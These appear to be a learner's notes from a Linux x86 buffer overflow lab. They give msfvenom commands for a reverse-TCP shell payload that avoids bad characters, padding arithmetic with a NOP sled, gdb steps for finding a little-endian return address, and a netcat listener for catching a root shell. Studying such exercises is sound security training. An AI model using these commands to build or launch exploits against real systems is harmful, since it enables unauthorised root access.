Skip to content

New shellcode & Return Address

Generating the shellcode without the bad characters

  • msfvenom -p linux/x86/shell_reverse_tcp lhost=<LHOST> lport=<LPORT> --format c --arch x86 --platform linux --bad-chars "<chars>" --out <filename>
  • msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode
    • says 95 bytes

MATH again

  • 'A' * 1036 - 95 - 124 = 817
  • 'shellcode'
  • 'B' * 4
    • Not sure how we landed at 124
  • run $(python -c "print 'A'*817 + '\x90' * 124 + '_SHELLCODE_' + 'B'*4 ")

Calculating the Return Address

  • after the bad chars are eliminated.
  • we do x/2000xb $esp+550 again
  • now find the address with the NOP sleds
  • take one of those addresses and replace the 'B'*4 with this address
  • enter it in little endian (reverse order)
  • Start a nc listener on port 31337 that we entered in the shellcode
  • start the exploit using run $(python -c print buffer + nop + shellcode + return address )
  • Now, while exploiting the program, DONT run it using gdb - this will not give you the root shell.
  • Run the program normally with our payload to get root.